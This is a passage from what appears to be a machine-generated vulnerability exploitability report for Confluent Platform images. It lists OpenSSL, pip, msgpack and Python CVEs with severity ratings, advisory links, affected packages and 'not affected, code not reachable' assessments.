        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-7x88-9hgc-69gf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28389"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28389"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-31789",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Issue summary: Converting an excessively large OCTET STRING value to\na hexadecimal string leads to a heap buffer overflow on 32 bit platforms.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nan attacker controlled code execution or other undefined behavior.\n\nIf an attacker can supply a crafted X.509 certificate with an excessively\nlarge OCTET STRING value in extensions such as the Subject Key Identifier\n(SKID) or Authority Key Identifier (AKID) which are being converted to hex,\nthe size of the buffer needed for the result is calculated as multiplication\nof the input length by 3. On 32 bit platforms, this multiplication may overflow\nresulting in the allocation of a smaller buffer and a heap buffer overflow.\n\nApplications and services that print or log contents of untrusted X.509\ncertificates are vulnerable to this issue. As the certificates would have\nto have sizes of over 1 Gigabyte, printing or logging such certificates\nis a fairly unlikely operation and only 32 bit platforms are affected,\nthis issue was assigned Low severity.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-31789"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-31789"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-j79m-9jxq-788r"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31789"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-31789"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3219",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        434
      ],
      "description": "pip handles concatenated tar and ZIP files as ZIP files regardless of filename or whether a file is both a tar and ZIP file. This behavior could result in confusing installation behavior, such as installing \"incorrect\" files according to the filename of the archive. New behavior only proceeds with installation if the file identifies uniquely as a ZIP or tar archive, not as both.",
      "recommendation": "Upgrade pip to version 26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3219"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/20/8"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3219"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/issues/13867"
        },
        {
          "url": "https://github.com/pypa/pip/pull/13870"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QAJ5JIVWWCAJ4EZL2FP5MOOW35JS7LRJ"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QAJ5JIVWWCAJ4EZL2FP5MOOW35JS7LRJ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3219"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3219"
        }
      ],
      "published": "2026-04-20T16:16:45+00:00",
      "updated": "2026-06-17T10:43:14+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/pip@26.0.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32284",
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "The msgpack decoder fails to properly validate the input buffer length when processing truncated fixext data (format codes 0xd4-0xd8). This can lead to an out-of-bounds read and a runtime panic, allowing a denial of service attack.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32284"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32284"
        },
        {
          "url": "https://github.com/golang/vulndb/issues/4513"
        },
        {
          "url": "https://github.com/shamaton/msgpack"
        },
        {
          "url": "https://github.com/shamaton/msgpack/issues/59"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32284"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4513"
        },
        {
          "url": "https://securityinfinity.com/research/shamaton-msgpack-oob-panic-fixext-dos-2026"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32284"
        }
      ],
      "published": "2026-03-26T20:16:12+00:00",
      "updated": "2026-06-17T10:35:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3276",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "unicodedata.normalize() can take excessive CPU time when processing\nspecially crafted Unicode input containing long runs of combining characters\nwith alternating Canonical Combining Class values.\nThis affects all normalization forms.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3276"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/06/03/15"
        },
        {
